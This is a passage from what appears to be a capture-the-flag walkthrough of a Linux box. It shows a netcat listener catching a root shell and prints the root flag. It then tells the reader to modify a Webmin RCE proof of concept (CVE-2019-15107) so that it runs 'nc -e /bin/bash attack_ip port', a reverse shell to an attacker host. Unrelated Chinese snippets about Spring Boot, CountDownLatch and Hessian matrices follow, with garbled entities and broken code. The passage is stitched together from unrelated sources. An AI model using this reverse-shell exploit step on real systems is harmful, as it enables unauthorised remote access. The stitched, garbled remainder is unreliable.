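    "/home/zenitsu/to_nezuko/send_message_to_nezuko.sh": FileInfo(1001, 0o644),
    "/home/zenitsu/to_nezuko": FileInfo(1001, 0o755),
}
```

On a live host, `audit_root_cron(open("/var/spool/cron/crontabs/root").read())` uses the default filesystem lookup; both findings here would have flagged the box before anyone appended a line to the script.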

image-20230115213639971

third flag

┌──(pinginglab㉿pinginglab)-[~]
└─$ nc  -lnvp 5555
listening on [any] 5555 ...

id
id
id
id
id
id
connect to [192.168.219.177] from (UNKNOWN) [192.168.219.180] 41430
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
id
uid=0(root) gid=0(root) groups=0(root)
ls
root.txt
snap
cat root.txt
Congratulations on getting the root shell!
Tell me what do you think about this box at my twitter, @yunaranyancat



3ca33b8158d9dee5c35a7d6d793c7fd5


other escape

image-20230115215233660

image-20230115215246677

image-20230115215842807

image-20230115215854321

using:

https://www.bilibili.com/read/cv3530863/

Then edit the poc.sh script: replace the part of the script that executes echo '$FLAG' with nc -e /bin/bash attack_ip port. After the change it looks like this:

echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
curl -ks … -d 'user=wheel&pam=&expired=2&…' $URI'/session_login.cgi'|grep $FLAG>/dev/null 2>&1

Author: 合天网安实验室, https://www.bilibili.com/read/cv3530863/ (source: bilibili)


springboot静态资源目录访问,及自定义静态资源路径,index页面的访问

springboot静态资源目录访问&#xff0c;及自定义静态资源路径&#xff0c;index页面的访问静态资源目录的访问位置静态资源访问测试自定义静态资源路径和静态资源请求映射web首页的访问自定义静态资源请求映射影响index.html首页的访问的**解决方案**&#xff1a;1.取消自定义…

【JUC系列】CountDownLatch实现原理

简单示例 public class Main {private static final int NUM 3;public static void main(String[] args) throws InterruptedException {CountDownLatch latch new CountDownLatch(NUM);for (int i 0; i < NUM; i) {new Thread(() -> {try {Thread.sleep(2000);Syste…

梯度之上:Hessian 矩阵

原文链接&#xff1a;原文 文章目录梯度之上&#xff1a;Hessian 矩阵梯度、雅克比矩阵海森矩阵海森矩阵应用梯度之上&#xff1a;Hessian 矩阵 本文讨论研究梯度下降法的一个有力的数学工具&#xff1a;海森矩阵。在讨论海森矩阵之前&#xff0c;需要首先了解梯度和雅克比矩阵…